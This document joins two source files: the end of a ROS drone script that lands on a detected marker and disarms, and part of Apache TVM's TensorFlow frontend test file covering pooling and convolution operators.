            # BUG FIX: the original indexed circles_copy[-1] here, but this
            # branch is only reached when circles_copy is empty, raising
            # IndexError. Fall back to the last successful detection instead.
            navigate_wait(last[-1].cx_map, last[-1].cy_map, 1.5)
telem = get_telemetry_aruco()
print("777")
# LANDING SYSTEM
print("markerType_LANDING", markerType)
print("STAGE2")
# Final visual-servo landing: for up to TIMEOUT_H seconds keep centring the
# drone over the detected landing zone in the body frame while descending.
time_st = time.time()
TIMEOUT_H = 2.913
landing_update_rate = rospy.Rate(9)
OFFSET = [18, 18] # pixels; relax the border margin for the final approach
while (time.time() - time_st) < TIMEOUT_H:
    # Keep only landing-zone detections matching the QR-selected type.
    markers = [i for i in circles_GLOBAL if circle_type_mapping[i.color] == markerType]
    print(markers)
    if len(markers) > 0:
        marker = markers[0]
        # Express the zone position in the body frame for direct servoing.
        x_b, y_b, z_b, _ = transform_xyz_yaw(
            marker.cx_cam, marker.cy_cam, marker.cz_cam, 0, "main_camera_optical", "body", listener)
        # nav_broadcaster.sendTransform(
        #     (x_b, y_b, z_b),
        #     tf.transformations.quaternion_from_euler(0, 0, 0),
        #     rospy.Time.now(),
        #     "landing_target",
        #     "body"
        # )
        rospy.sleep(0.0913)
        print(x_b, y_b, z_b)
        # Move over the marker while commanding a slight descent.
        set_position(x=x_b, y=y_b, z=-0.075, frame_id="body")
        # Close enough to the ground — hand over to the landing service.
        if abs(z_b) < 0.2:
            break
    landing_update_rate.sleep()
print("LANDDDDDDDDDDDDDDDD")
land()
vr.stop()
rospy.sleep(1.5)
print("DISARM")
arming(False)
print('DONE')
|
test_forward.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=import-self, invalid-name, unused-argument
"""
Tensorflow testcases
====================
This article is a test script to test tensorflow operator with Relay.
"""
from __future__ import print_function
import threading
import numpy as np
import pytest
try:
import tensorflow.compat.v1 as tf
except ImportError:
import tensorflow as tf
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import graph_util
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.ops import init_ops
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import gen_functional_ops
from distutils.version import LooseVersion
import tvm
from tvm import te
from tvm import relay
import tvm.relay.testing.tf as tf_testing
from tvm.runtime.vm import VirtualMachine
from packaging import version as package_version
import tvm.testing
#######################################################################
# Generic run functions for TVM & tensorflow
# ------------------------------------------
def convert_to_list(x):
    """Wrap a non-list value into a single-element list; lists pass through."""
    return x if isinstance(x, list) else [x]
# Mapping from dtype name strings to the corresponding TensorFlow dtypes.
tf_dtypes = {
    "float32": tf.float32,
    "float16": tf.float16,
    "float64": tf.float64,
    "int32": tf.int32,
    "uint8": tf.uint8,
    "int8": tf.int8,
    "int16": tf.int16,
    "uint16": tf.uint16,
    "int64": tf.int64,
}
def vmobj_to_list(o):
    """Flatten a TVM runtime object into a flat Python list.

    Handles NDArray (single numpy array), ADT containers (recursively
    flattened), and Relay constructor values for list/tensor ADTs.
    Raises RuntimeError for anything else.
    """
    if isinstance(o, tvm.nd.NDArray):
        return [o.asnumpy()]
    if isinstance(o, tvm.runtime.container.ADT):
        flattened = []
        for field in o:
            flattened += vmobj_to_list(field)
        return flattened
    if isinstance(o, tvm.relay.backend.interpreter.ConstructorValue):
        name = o.constructor.name_hint
        if name == "Cons":
            # Linked list: the flattened head followed by the flattened tail.
            head = vmobj_to_list(o.fields[0])
            head.extend(vmobj_to_list(o.fields[1]))
            return head
        if name == "Nil":
            return []
        if "tensor_nil" in name:
            return [0]
        if "tensor" in name:
            return [o.fields[0].asnumpy()]
        raise RuntimeError("Unknown object type: %s" % name)
    raise RuntimeError("Unknown object type: %s" % type(o))
def run_tvm_graph(
    graph_def,
    input_data,
    input_node,
    num_output=1,
    target="llvm",
    out_names=None,
    opt_level=3,
    mode="graph_executor",
    cuda_layout="NCHW",
    layout=None,
    disabled_pass=None,
    ignore_in_shape=False,
    serialize=False,
):
    """ Generic function to compile on relay and execute on tvm """
    # `mode` selects the execution path: "debug" (interpreter), "vm"
    # (Relay virtual machine, optionally serialised/deserialised), or the
    # default graph executor.
    input_data = convert_to_list(input_data)
    input_node = convert_to_list(input_node)
    if target == "cuda":
        layout = cuda_layout
    target_host = None
    # Build the input-shape dict unless the caller wants shapes inferred.
    if ignore_in_shape:
        shape_dict = None
    else:
        shape_dict = {
            e: i.shape if hasattr(i, "shape") else () for e, i in zip(input_node, input_data)
        }
    mod, params = relay.frontend.from_tensorflow(
        graph_def, layout=layout, shape=shape_dict, outputs=out_names
    )
    dev = tvm.device(target, 0)
    if mode == "debug":
        # Interpreter path: bind each Relay parameter by name, either from
        # the supplied inputs or from the converted constants.
        ex = relay.create_executor(mode, mod=mod, device=tvm.cpu(), target="llvm")
        inputs = []
        for param in mod["main"].params:
            found = False
            for i, n in enumerate(input_node):
                if n == param.name_hint:
                    found = True
                    inputs.append(tvm.nd.array(input_data[i]))
                    break
            # Interpreter doesn't bind constants, so still need to find in params
            if not found:
                inputs.append(tvm.nd.array(params[param.name_hint]))
        result = ex.evaluate()(*inputs)
        return vmobj_to_list(result)
    elif mode == "vm":
        # Virtual-machine path.
        with tvm.transform.PassContext(opt_level=opt_level, disabled_pass=disabled_pass):
            print(mod["main"])
            mod = relay.transform.InferType()(mod)
            vm_exec = relay.vm.compile(mod, target="llvm", params=params)
        # Optionally round-trip the executable through serialisation to
        # exercise save/load.
        if serialize:
            code, lib = vm_exec.save()
            vm_exec = tvm.runtime.vm.Executable.load_exec(code, lib)
        vm = VirtualMachine(vm_exec, tvm.cpu())
        inputs = {}
        for e, i in zip(input_node, input_data):
            inputs[e] = tvm.nd.array(i)
        result = vm.invoke("main", **inputs)
        return vmobj_to_list(result)
    else:
        # Graph-executor path (default).
        with tvm.transform.PassContext(opt_level=opt_level, disabled_pass=disabled_pass):
            target = tvm.target.Target(target, target_host)
            graph, lib, params = relay.build(mod, target=target, params=params)
        from tvm.contrib import graph_executor

        m = graph_executor.create(graph, lib, dev)
        # set inputs
        for e, i in zip(input_node, input_data):
            if e != "":
                m.set_input(e, tvm.nd.array(i))
        m.set_input(**params)
        # execute
        m.run()
        # get outputs
        assert out_names is None or num_output == len(
            out_names
        ), "out_names: {} num_output: {}".format(out_names, num_output)
        tvm_output_list = [m.get_output(i).asnumpy() for i in range(num_output)]
        return tvm_output_list
def run_tf_graph(sess, input_data, input_node, output_node):
    """ Generic function to execute tensorflow """
    input_data = convert_to_list(input_data)
    input_node = convert_to_list(input_node)
    output_node = convert_to_list(output_node)
    tensors = [sess.graph.get_tensor_by_name(name) for name in output_node]
    # A single empty input name means the graph takes no fed inputs.
    if len(input_node) == 1 and input_node[0] == "":
        return sess.run(tensors)
    feed_dict = {name: input_data[idx] for idx, name in enumerate(input_node)}
    return sess.run(tensors, feed_dict)
def compare_tf_with_tvm(
    in_data,
    in_name,
    out_name,
    init_global_variables=False,
    no_gpu=False,
    opt_level=3,
    mode="graph_executor",
    cuda_layout="NCHW",
    add_shapes_to_graph_def=True,
    targets=None,
):
    """Generic function to generate and compare tensorflow and TVM output"""

    def name_without_num(name):
        # Strip the output index suffix, e.g. "Conv2D:0" -> "Conv2D".
        return name.split(":")[0] if ":" in name else name

    out_name = convert_to_list(out_name)
    out_node = [name_without_num(name) for name in out_name]
    in_data = convert_to_list(in_data)
    in_name = convert_to_list(in_name)
    in_node = [name_without_num(name) for name in in_name]
    with tf.Session() as sess:
        if init_global_variables:
            sess.run(variables.global_variables_initializer())
        final_graph_def = (
            tf_testing.AddShapesToGraphDef(sess, out_node)
            if add_shapes_to_graph_def
            else tf.get_default_graph().as_graph_def()
        )
        # Reference output from TensorFlow itself.
        tf_output = run_tf_graph(sess, in_data, in_name, out_name)
        devices = targets if targets else ["llvm", "cuda"]
        for device in devices:
            dev = tvm.device(device, 0)
            if not tvm.testing.device_enabled(device):
                print("Skip because %s is not enabled" % device)
                continue
            if no_gpu and device == "cuda":
                continue
            if "cublas" in device and not tvm.get_global_func("tvm.contrib.cublas.matmul", True):
                print("Skip because cublas is not enabled: %s" % device)
                continue
            tvm_output = run_tvm_graph(
                final_graph_def,
                in_data,
                in_node,
                target=device,
                out_names=out_name,
                num_output=len(out_name),
                opt_level=opt_level,
                mode=mode,
                cuda_layout=cuda_layout,
            )
            # since the names from tensorflow and relay runs are not exactly same,
            # first len(tf_output) will be compared
            for i in range(len(tf_output)):
                if not isinstance(tf_output[i], np.ndarray):
                    # Scalar TF outputs must map to 0-d TVM outputs.
                    assert len(tvm_output[i].shape) == 0
                tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
        # NOTE(review): redundant — the `with` block already closes the session.
        sess.close()
def is_gpu_available():
    """Return True when TensorFlow can see at least one GPU device."""
    from tensorflow.python.client import device_lib

    gpus = [d.name for d in device_lib.list_local_devices() if d.device_type == "GPU"]
    if not gpus:
        return False
    print("Tensorflow GPU:", gpus)
    return True
#######################################################################
# Pooling
# -------
def _test_pooling_iteration(input_shape, **kwargs):
    """ One iteration of pool operation with given shapes and attributes """
    # Deterministic input data: -1, -2, ... reshaped to input_shape.
    x = -np.arange(np.prod(input_shape), dtype=np.float32).reshape(input_shape) - 1
    with tf.Graph().as_default():
        in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
        nn_ops.pool(in_data, **kwargs)
        out_name = "max_pool:0" if kwargs["pooling_type"] == "MAX" else "avg_pool:0"
        compare_tf_with_tvm(x, "Placeholder:0", out_name)
def _test_pooling(input_shape, **kwargs):
    """Run one pooling test, and when a GPU is available repeat the 4-D
    case with the layout converted from NHWC to NCHW."""
    _test_pooling_iteration(input_shape, **kwargs)
    if is_gpu_available() and len(input_shape) == 4:
        nchw_shape = [input_shape[ii] for ii in (0, 3, 1, 2)]
        kwargs["data_format"] = "NCHW"
        _test_pooling_iteration(nchw_shape, **kwargs)
@tvm.testing.uses_gpu
def test_forward_pooling():
    """ Pooling: exercises pool2d/pool3d for AVG and MAX with various
    layouts, paddings, strides and dilation rates. """
    # TensorFlow only supports NDHWC for max_pool3d on CPU
    for pool_type in ["AVG", "MAX"]:
        # NDHWC is the default layout for max_pool3d and avg_pool3d in TensorFlow
        _test_pooling(
            input_shape=[1, 3, 32, 32, 32],
            window_shape=[2, 2, 2],
            padding="VALID",
            pooling_type=pool_type,
            dilation_rate=[1, 1, 1],
            strides=[2, 2, 2],
        )
        _test_pooling(
            input_shape=[1, 3, 32, 32, 32],
            window_shape=[1, 1, 1],
            padding="SAME",
            pooling_type=pool_type,
            dilation_rate=[1, 1, 1],
            strides=[1, 1, 1],
        )
        _test_pooling(
            input_shape=[1, 3, 32, 32, 32],
            window_shape=[2, 2, 2],
            padding="SAME",
            pooling_type=pool_type,
            dilation_rate=[1, 1, 1],
            strides=[2, 2, 2],
        )
        # test cases for max_pool3d & avg_pool3d with layout NCDHW
        # TensorFlow pool3d doesn't support NCDHW on cpu
        if is_gpu_available():
            _test_pooling(
                input_shape=[1, 3, 32, 32, 32],
                window_shape=[1, 1, 1],
                padding="SAME",
                pooling_type=pool_type,
                dilation_rate=[1, 1, 1],
                strides=[1, 1, 1],
                data_format="NCDHW",
            )
            _test_pooling(
                input_shape=[1, 3, 32, 32, 32],
                window_shape=[2, 2, 2],
                padding="VALID",
                pooling_type=pool_type,
                dilation_rate=[1, 1, 1],
                strides=[2, 2, 2],
                data_format="NCDHW",
            )
        # 2-D pooling cases (NHWC).
        _test_pooling(
            input_shape=[2, 9, 10, 2],
            window_shape=[1, 1],
            padding="SAME",
            pooling_type=pool_type,
            dilation_rate=[1, 1],
            strides=[1, 1],
        )
        _test_pooling(
            input_shape=[2, 10, 9, 2],
            window_shape=[1, 1],
            padding="SAME",
            pooling_type=pool_type,
            dilation_rate=[1, 1],
            strides=[1, 1],
        )
        _test_pooling(
            input_shape=[2, 9, 10, 2],
            window_shape=[2, 1],
            padding="SAME",
            pooling_type=pool_type,
            dilation_rate=[1, 1],
            strides=[1, 1],
        )
        _test_pooling(
            input_shape=[2, 10, 9, 2],
            window_shape=[2, 3],
            padding="SAME",
            pooling_type=pool_type,
            dilation_rate=[1, 1],
            strides=[2, 1],
        )
        # Tests involving SpaceToBatchND
        _test_pooling(
            input_shape=[1, 1, 2, 1],
            window_shape=[1, 1],
            padding="VALID",
            pooling_type=pool_type,
            dilation_rate=[1, 2],
        )
        _test_pooling(
            input_shape=[1, 2, 1],
            window_shape=[1],
            padding="VALID",
            pooling_type=pool_type,
            dilation_rate=[2],
        )
    # Explicit padding
    if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
        _test_pooling(
            input_shape=[2, 9, 10, 2],
            window_shape=[4, 4],
            padding=[[0, 0], [0, 1], [2, 3], [0, 0]],
            pooling_type="MAX",
            dilation_rate=[1, 1],
            strides=[1, 1],
        )
#######################################################################
# Convolution
# -----------
def _test_convolution(
    opname,
    tensor_in_sizes,
    filter_in_sizes,
    dilations,
    strides,
    padding,
    data_format,
    deconv_output_shape=None,
    add_shapes_to_graph_def=True,
):
    """One iteration of convolution with given shapes and attributes.

    Builds a single Conv2D / Conv2DTranspose / DepthwiseConv2dNative node in a
    fresh TF graph and compares the TF result against TVM.

    Parameters
    ----------
    opname : str
        "conv" or "conv_transpose"; any other value selects
        depthwise_conv2d_native.
    tensor_in_sizes : list of int
        Input tensor shape (layout per ``data_format``).
    filter_in_sizes : list of int
        Filter tensor shape.
    dilations, strides : list of int
        Spatial (2-element) dilations/strides; batch and channel entries are
        prepended below according to the layout.
    padding : str or list
        "SAME"/"VALID" or an explicit padding specification.
    data_format : str
        "NHWC" or "NCHW".
    deconv_output_shape : list of int, optional
        Output shape, used only by "conv_transpose".
    add_shapes_to_graph_def : bool
        Whether shape attributes are attached to the exported graph def.
    """
    # Fix: avoid a mutable default argument ([]); None-sentinel is the safe idiom.
    deconv_output_shape = [] if deconv_output_shape is None else deconv_output_shape
    total_size_1 = np.prod(tensor_in_sizes)
    total_size_2 = np.prod(filter_in_sizes)
    # Initializes the input tensor with array containing incrementing
    # numbers from 1.
    data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
    filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
    with tf.Graph().as_default():
        in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
        in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
        # Expand the 2-element spatial strides/dilations to full 4-element
        # form expected by TF, per layout.
        if data_format == "NHWC":
            strides = [1] + strides + [1]
            dilations = [1] + dilations + [1]
        else:
            strides = [1, 1] + strides
            dilations = [1, 1] + dilations
        if opname == "conv":
            nn_ops.conv2d(
                in_data,
                in_filter,
                strides=strides,
                dilations=dilations,
                padding=padding,
                data_format=data_format,
            )
            compare_tf_with_tvm(
                np.reshape(data_array, tensor_in_sizes).astype("float32"),
                "Placeholder:0",
                "Conv2D:0",
                add_shapes_to_graph_def=add_shapes_to_graph_def,
            )
        elif opname == "conv_transpose":
            nn_ops.conv2d_transpose(
                in_data,
                in_filter,
                output_shape=deconv_output_shape,
                strides=strides,
                padding=padding,
                data_format=data_format,
            )
            compare_tf_with_tvm(
                np.reshape(data_array, tensor_in_sizes).astype("float32"),
                "Placeholder:0",
                "conv2d_transpose:0",
                add_shapes_to_graph_def=add_shapes_to_graph_def,
            )
        else:
            nn_ops.depthwise_conv2d_native(
                in_data,
                in_filter,
                strides=strides,
                dilations=dilations,
                padding=padding,
                data_format=data_format,
            )
            compare_tf_with_tvm(
                np.reshape(data_array, tensor_in_sizes).astype("float32"),
                "Placeholder:0",
                "DepthwiseConv2dNative:0",
                add_shapes_to_graph_def=add_shapes_to_graph_def,
            )
@tvm.testing.uses_gpu
def test_forward_convolution():
    """Conv2D / DepthwiseConv2dNative / Conv2DTranspose over many shape,
    stride and padding combinations.

    NCHW-layout cases run only when a GPU is available; NHWC cases always
    run.  Explicit-padding cases require TF >= 2.4.1.
    """
    if is_gpu_available():
        # NCHW layout, regular convolutions.
        _test_convolution("conv", [4, 176, 8, 8], [1, 1, 176, 32], [1, 1], [1, 1], "SAME", "NCHW")
        _test_convolution("conv", [4, 19, 17, 17], [3, 3, 19, 19], [1, 1], [2, 2], "VALID", "NCHW")
        _test_convolution("conv", [4, 124, 17, 17], [1, 1, 124, 19], [1, 1], [1, 1], "SAME", "NCHW")
        _test_convolution("conv", [4, 12, 17, 17], [3, 3, 12, 32], [1, 1], [2, 2], "VALID", "NCHW")
        # NCHW layout, depthwise convolutions (channel multipliers 1 and 2).
        _test_convolution(
            "depthwise", [4, 176, 8, 8], [1, 1, 176, 1], [1, 1], [1, 1], "SAME", "NCHW"
        )
        _test_convolution(
            "depthwise", [4, 19, 17, 17], [3, 3, 19, 1], [1, 1], [2, 2], "VALID", "NCHW"
        )
        _test_convolution(
            "depthwise", [4, 124, 17, 17], [1, 1, 124, 1], [1, 1], [1, 1], "SAME", "NCHW"
        )
        _test_convolution(
            "depthwise", [4, 12, 17, 17], [3, 3, 12, 1], [1, 1], [2, 2], "VALID", "NCHW"
        )
        _test_convolution(
            "depthwise", [4, 12, 17, 17], [3, 3, 12, 2], [1, 1], [2, 2], "VALID", "NCHW"
        )
        # NCHW layout, transposed convolutions over varied kernels/strides.
        _test_convolution(
            "conv_transpose",
            [4, 32, 8, 8],
            [1, 1, 176, 32],
            [1, 1],
            [1, 1],
            "SAME",
            "NCHW",
            [4, 176, 8, 8],
        )
        _test_convolution(
            "conv_transpose",
            [4, 32, 8, 8],
            [2, 2, 176, 32],
            [1, 1],
            [1, 1],
            "SAME",
            "NCHW",
            [4, 176, 8, 8],
        )
        _test_convolution(
            "conv_transpose",
            [4, 32, 8, 8],
            [2, 2, 176, 32],
            [1, 1],
            [2, 2],
            "SAME",
            "NCHW",
            [4, 176, 15, 15],
        )
        _test_convolution(
            "conv_transpose",
            [4, 32, 8, 8],
            [3, 3, 176, 32],
            [1, 1],
            [1, 1],
            "SAME",
            "NCHW",
            [4, 176, 8, 8],
        )
        _test_convolution(
            "conv_transpose",
            [4, 32, 8, 8],
            [3, 3, 176, 32],
            [1, 1],
            [2, 2],
            "SAME",
            "NCHW",
            [4, 176, 15, 15],
        )
        _test_convolution(
            "conv_transpose",
            [4, 32, 8, 8],
            [3, 3, 176, 32],
            [1, 1],
            [2, 2],
            "SAME",
            "NCHW",
            [4, 176, 16, 16],
        )
        _test_convolution(
            "conv_transpose",
            [4, 19, 8, 8],
            [3, 3, 19, 19],
            [1, 1],
            [2, 2],
            "VALID",
            "NCHW",
            [4, 19, 17, 17],
        )
        _test_convolution(
            "conv_transpose",
            [4, 19, 17, 17],
            [1, 1, 124, 19],
            [1, 1],
            [1, 1],
            "SAME",
            "NCHW",
            [4, 124, 17, 17],
        )
        _test_convolution(
            "conv_transpose",
            [4, 19, 17, 17],
            [3, 3, 124, 19],
            [1, 1],
            [1, 1],
            "SAME",
            "NCHW",
            [4, 124, 17, 17],
        )
        _test_convolution(
            "conv_transpose",
            [4, 32, 8, 8],
            [3, 3, 12, 32],
            [1, 1],
            [2, 2],
            "VALID",
            "NCHW",
            [4, 12, 17, 17],
        )
        # kernel 2x2, strides (2,2)
        _test_convolution(
            "conv_transpose",
            [4, 19, 8, 8],
            [2, 2, 19, 19],
            [1, 1],
            [2, 2],
            "VALID",
            "NCHW",
            [4, 19, 16, 16],
        )
        _test_convolution(
            "conv_transpose",
            [4, 32, 8, 8],
            [2, 2, 12, 32],
            [1, 1],
            [2, 2],
            "VALID",
            "NCHW",
            [4, 12, 16, 16],
        )
        # output channel is 1
        _test_convolution(
            "conv_transpose",
            [1, 19, 8, 8],
            [1, 1, 1, 19],
            [1, 1],
            [1, 1],
            "VALID",
            "NCHW",
            [1, 1, 8, 8],
        )
    # NHWC layout: runs on any target.
    _test_convolution("conv", [4, 8, 8, 176], [1, 1, 176, 32], [1, 1], [1, 1], "SAME", "NHWC")
    _test_convolution("conv", [4, 17, 17, 19], [3, 3, 19, 19], [1, 1], [2, 2], "VALID", "NHWC")
    _test_convolution("conv", [4, 17, 17, 124], [1, 1, 124, 19], [1, 1], [1, 1], "SAME", "NHWC")
    _test_convolution("conv", [4, 17, 17, 12], [3, 3, 12, 32], [1, 1], [2, 2], "VALID", "NHWC")
    _test_convolution(
        "conv",
        [4, 17, 17, 12],
        [3, 3, 12, 32],
        [1, 1],
        [2, 2],
        "VALID",
        "NHWC",
        add_shapes_to_graph_def=False,
    )
    _test_convolution("depthwise", [4, 8, 8, 176], [1, 1, 176, 1], [1, 1], [1, 1], "SAME", "NHWC")
    _test_convolution("depthwise", [4, 17, 17, 19], [3, 3, 19, 1], [1, 1], [2, 2], "VALID", "NHWC")
    _test_convolution("depthwise", [4, 17, 17, 124], [1, 1, 124, 1], [1, 1], [1, 1], "SAME", "NHWC")
    _test_convolution("depthwise", [4, 17, 17, 12], [3, 3, 12, 1], [1, 1], [2, 2], "VALID", "NHWC")
    _test_convolution("depthwise", [4, 17, 17, 12], [3, 3, 12, 2], [1, 1], [2, 2], "VALID", "NHWC")
    _test_convolution(
        "depthwise",
        [4, 17, 17, 12],
        [3, 3, 12, 2],
        [1, 1],
        [2, 2],
        "VALID",
        "NHWC",
        add_shapes_to_graph_def=False,
    )
    _test_convolution(
        "conv_transpose",
        [4, 8, 8, 32],
        [1, 1, 176, 32],
        [1, 1],
        [1, 1],
        "SAME",
        "NHWC",
        [4, 8, 8, 176],
    )
    _test_convolution(
        "conv_transpose",
        [4, 8, 8, 32],
        [2, 2, 176, 32],
        [1, 1],
        [1, 1],
        "SAME",
        "NHWC",
        [4, 8, 8, 176],
    )
    _test_convolution(
        "conv_transpose",
        [4, 8, 8, 32],
        [2, 2, 176, 32],
        [1, 1],
        [2, 2],
        "SAME",
        "NHWC",
        [4, 15, 15, 176],
    )
    _test_convolution(
        "conv_transpose",
        [4, 8, 8, 32],
        [3, 3, 176, 32],
        [1, 1],
        [1, 1],
        "SAME",
        "NHWC",
        [4, 8, 8, 176],
    )
    _test_convolution(
        "conv_transpose",
        [4, 8, 8, 32],
        [3, 3, 176, 32],
        [1, 1],
        [2, 2],
        "SAME",
        "NHWC",
        [4, 15, 15, 176],
    )
    _test_convolution(
        "conv_transpose",
        [4, 8, 8, 32],
        [3, 3, 176, 32],
        [1, 1],
        [2, 2],
        "SAME",
        "NHWC",
        [4, 16, 16, 176],
    )
    _test_convolution(
        "conv_transpose",
        [4, 8, 8, 19],
        [3, 3, 19, 19],
        [1, 1],
        [2, 2],
        "VALID",
        "NHWC",
        [4, 17, 17, 19],
    )
    _test_convolution(
        "conv_transpose",
        [4, 17, 17, 19],
        [1, 1, 124, 19],
        [1, 1],
        [1, 1],
        "SAME",
        "NHWC",
        [4, 17, 17, 124],
    )
    _test_convolution(
        "conv_transpose",
        [4, 17, 17, 19],
        [3, 3, 124, 19],
        [1, 1],
        [1, 1],
        "SAME",
        "NHWC",
        [4, 17, 17, 124],
    )
    _test_convolution(
        "conv_transpose",
        [4, 8, 8, 32],
        [3, 3, 12, 32],
        [1, 1],
        [2, 2],
        "VALID",
        "NHWC",
        [4, 17, 17, 12],
    )
    # kernel 2x2, strides (2,2)
    _test_convolution(
        "conv_transpose",
        [4, 8, 8, 19],
        [2, 2, 19, 19],
        [1, 1],
        [2, 2],
        "VALID",
        "NHWC",
        [4, 16, 16, 19],
    )
    _test_convolution(
        "conv_transpose",
        [4, 8, 8, 32],
        [2, 2, 12, 32],
        [1, 1],
        [2, 2],
        "VALID",
        "NHWC",
        [4, 16, 16, 12],
    )
    # output channel is 1
    _test_convolution(
        "conv_transpose",
        [1, 8, 8, 19],
        [1, 1, 1, 19],
        [1, 1],
        [1, 1],
        "VALID",
        "NHWC",
        [1, 8, 8, 1],
    )
    # Test without adding shapes to graph def
    _test_convolution(
        "conv_transpose",
        [4, 8, 8, 32],
        [1, 1, 176, 32],
        [1, 1],
        [1, 1],
        "SAME",
        "NHWC",
        [4, 8, 8, 176],
        add_shapes_to_graph_def=False,
    )
    # Explicit padding
    if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
        _test_convolution(
            "conv",
            [4, 8, 8, 16],
            [1, 1, 16, 32],
            [1, 1],
            [1, 1],
            [[0, 0], [2, 3], [0, 1], [0, 0]],
            "NHWC",
        )
        _test_convolution(
            "depthwise",
            [4, 8, 8, 16],
            [1, 1, 16, 1],
            [1, 1],
            [1, 1],
            [[0, 0], [2, 3], [0, 1], [0, 0]],
            "NHWC",
        )
        _test_convolution(
            "conv_transpose",
            [4, 8, 8, 32],
            [3, 3, 176, 32],
            [1, 1],
            [2, 2],
            [[0, 0], [1, 0], [1, 0], [0, 0]],
            "NHWC",
            [4, 16, 16, 176],
        )
#######################################################################
# Convolution3D
# -------------
def _test_convolution3d(
    opname,
    tensor_in_sizes,
    filter_in_sizes,
    dilations,
    strides,
    padding,
    data_format,
    deconv_output_shape=None,
    add_shapes_to_graph_def=True,
):
    """One iteration of 3D convolution with given shapes and attributes.

    Builds a Conv3D node in a fresh TF graph and compares TF against TVM.
    Only ``opname == "conv"`` is currently handled; other values build no op.
    ``deconv_output_shape`` is accepted for signature parity with
    ``_test_convolution`` but is unused here.
    """
    # Fix: avoid a mutable default argument ([]); None-sentinel is the safe idiom.
    deconv_output_shape = [] if deconv_output_shape is None else deconv_output_shape
    total_size_1 = np.prod(tensor_in_sizes)
    total_size_2 = np.prod(filter_in_sizes)
    # Initializes the input tensor with array containing incrementing
    # numbers from 1.
    data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
    filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
    with tf.Graph().as_default():
        in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
        in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
        # Expand 3-element spatial strides/dilations to the 5-element form
        # expected by TF, per layout.
        if data_format == "NDHWC":
            strides = [1] + strides + [1]
            dilations = [1] + dilations + [1]
        else:
            strides = [1, 1] + strides
            dilations = [1, 1] + dilations
        if opname == "conv":
            nn_ops.conv3d(
                in_data,
                in_filter,
                strides=strides,
                dilations=dilations,
                padding=padding,
                data_format=data_format,
            )
            compare_tf_with_tvm(
                np.reshape(data_array, tensor_in_sizes).astype("float32"),
                "Placeholder:0",
                "Conv3D:0",
                cuda_layout="NCDHW",
                add_shapes_to_graph_def=add_shapes_to_graph_def,
            )
@tvm.testing.uses_gpu
def test_forward_convolution3d():
    """Conv3D in NCDHW (GPU only) and NDHWC layouts."""
    if is_gpu_available():
        # NCDHW layout cases.
        _test_convolution3d(
            "conv", [4, 176, 8, 8, 8], [1, 1, 1, 176, 32], [1, 1, 1], [1, 1, 1], "SAME", "NCDHW"
        )
        _test_convolution3d(
            "conv", [4, 19, 17, 17, 17], [3, 3, 3, 19, 19], [1, 1, 1], [2, 2, 2], "VALID", "NCDHW"
        )
        _test_convolution3d(
            "conv", [4, 124, 17, 17, 17], [1, 1, 1, 124, 19], [1, 1, 1], [1, 1, 1], "SAME", "NCDHW"
        )
        _test_convolution3d(
            "conv", [4, 12, 17, 17, 17], [3, 3, 3, 12, 32], [1, 1, 1], [2, 2, 2], "VALID", "NCDHW"
        )
    # NDHWC layout cases run on any target.
    _test_convolution3d(
        "conv", [4, 8, 8, 8, 176], [1, 1, 1, 176, 32], [1, 1, 1], [1, 1, 1], "SAME", "NDHWC"
    )
    _test_convolution3d(
        "conv", [4, 17, 17, 17, 19], [3, 3, 3, 19, 19], [1, 1, 1], [2, 2, 2], "VALID", "NDHWC"
    )
    _test_convolution3d(
        "conv", [4, 17, 17, 17, 124], [1, 1, 1, 124, 19], [1, 1, 1], [1, 1, 1], "SAME", "NDHWC"
    )
    _test_convolution3d(
        "conv", [4, 17, 17, 17, 12], [3, 3, 3, 12, 32], [1, 1, 1], [2, 2, 2], "VALID", "NDHWC"
    )
    # Test without adding shapes to graph def
    _test_convolution3d(
        "conv",
        [4, 17, 17, 17, 12],
        [3, 3, 3, 12, 32],
        [1, 1, 1],
        [2, 2, 2],
        "VALID",
        "NDHWC",
        add_shapes_to_graph_def=False,
    )
#######################################################################
# Convolution3D Transpose
# -----------------------
def _test_convolution3d_transpose(
    data_shape,
    filter_shape,
    strides,
    padding,
    output_shape,
    data_format="NCDHW",
    add_shapes_to_graph_def=True,
):
    """One iteration of 3D transposed convolution, compared against TVM."""
    dtype = "float32"
    sample = np.random.uniform(size=data_shape).astype(dtype)
    kernel = np.random.uniform(size=filter_shape).astype(dtype)
    # Prepend batch/channel stride entries according to the layout.
    full_strides = [1] + strides + [1] if data_format == "NDHWC" else [1, 1] + strides
    with tf.Graph().as_default():
        placeholder = array_ops.placeholder(shape=data_shape, dtype=dtype)
        kernel_const = constant_op.constant(kernel, shape=filter_shape, dtype=dtype)
        nn_ops.conv3d_transpose(
            placeholder,
            kernel_const,
            output_shape=output_shape,
            strides=full_strides,
            padding=padding,
            data_format=data_format,
        )
        compare_tf_with_tvm(
            sample,
            "Placeholder:0",
            "conv3d_transpose:0",
            cuda_layout="NDHWC",
            add_shapes_to_graph_def=add_shapes_to_graph_def,
        )
